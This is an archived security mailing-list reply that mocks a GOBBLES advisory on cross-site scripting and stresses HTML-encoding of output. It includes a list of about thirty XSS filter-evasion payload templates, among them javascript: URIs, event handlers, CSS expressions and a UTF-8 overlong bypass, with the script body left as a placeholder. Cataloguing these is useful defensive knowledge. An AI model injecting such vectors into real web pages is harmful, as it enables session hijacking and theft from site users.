Re: GOBBLES SECURITY ADVISORY #33

[Andrew Clover <and () doxdesk com>]

> Only hotmail security historians like those at GOBBLES Security know of
> obscure feature in JavaScript language that make it easy to bypass thing
> like "<...>", "<script>...</script>", and "javascript:" filter for CSS
> attack using JavaScript.

This is a well-known problem and has been posted to Bugtraq before, eg.:

  http://online.securityfocus.com/archive/1/50782
  http://online.securityfocus.com/archive/1/27386

JavaScript entities were a idiotic mistake, and have not made it into the
ECMAScript spec. Only older Netscapes support them: Netscape 6/Mozilla does
away with them, thankfully. IE has never implemented them.

> Until now, that encoding information was private knowledge of the
> underground.

Oh, puh-lease. Some of us here can actually read RFCs, you know.

> HTML string completion / HTML closure

> Doesn't need much coverage since it pretty obvious to anyone with
> rational mind.

Quite so. Doesn't need *any* coverage really. All strings must be
HTML-encoded on output to HTML, and that includes &quot; escaping as
well as &amp;.

Sure, lots of people get this wrong, but then lots of people are idiots,
and even if you understand the issues it's easy to let one vulnerability
slip through. This is not news.

Here is a cut-n-paste collection of typical JavaScript-injection hacks
you may derive some glee from playing with. I've replaced all angle
brackets with double-round-brackets in case any AV software is feeling
particularly sensitive.

  ((a href="javas&#99;ript&#35;[code]"))
  ((div onmouseover="[code]"))
  ((img src="javascript:[code]"))
  ((img dynsrc="javascript:[code]")) [IE]
  ((input type="image" dynsrc="javascript:[code]")) [IE]
  ((bgsound src="javascript:[code]")) [IE]
  &((script))[code]((/script))
  &{[code]}; [N4]
  ((img src=&{[code]};)) [N4]
  ((link rel="stylesheet" href="javascript:[code]"))
  ((iframe src="vbscript:[code]")) [IE]
  ((img src="mocha:[code]")) [N4]
  ((img src="livescript:[code]")) [N4]
  ((a href="about:((s&#99;ript))[code]((/script))"))
  ((meta http-equiv="refresh" content="0;url=javascript:[code]"))
  ((body onload="[code]"))
  ((div style="background-image: url(javascript:[code]);"))
  ((div style="behaviour: url([link to code]);")) [IE]
  ((div style="binding: url([link to code]);")) [Mozilla]
  ((div style="width: expression([code]);")) [IE]
  ((style type="text/javascript"))[code]((/style)) [N4]
  ((object classid="clsid:..." codebase="javascript:[code]")) [IE]
  ((style))((!--((/style))((script))[code]//--))((/script))
  ((![CDATA[((!--]]))((script))[code]//--))((/script))
  ((!-- -- --))((script))[code]((/script))((!-- -- --))
  ((((script))[code]((/script))
  ((img src="blah"onmouseover="[code]"))
  ((img src="blah))" onmouseover="[code]"))
  ((xml src="javascript:[code]"))
  ((xml id="X"))((a))((b))&lt;script))[code]&lt;/script));((/b))((/a))((/xml))
    ((div datafld="b" dataformatas="html" datasrc="#X"))((/div))
  [\xC0][\xBC]script))[code][\xC0][\xBC]/script)) [UTF-8; IE, Opera]

> but there can only be one CSS king, and that king is GOBBLES.

That's nice dear.

-- 
Andrew Clover
mailto:and () doxdesk com
http://and.doxdesk.com/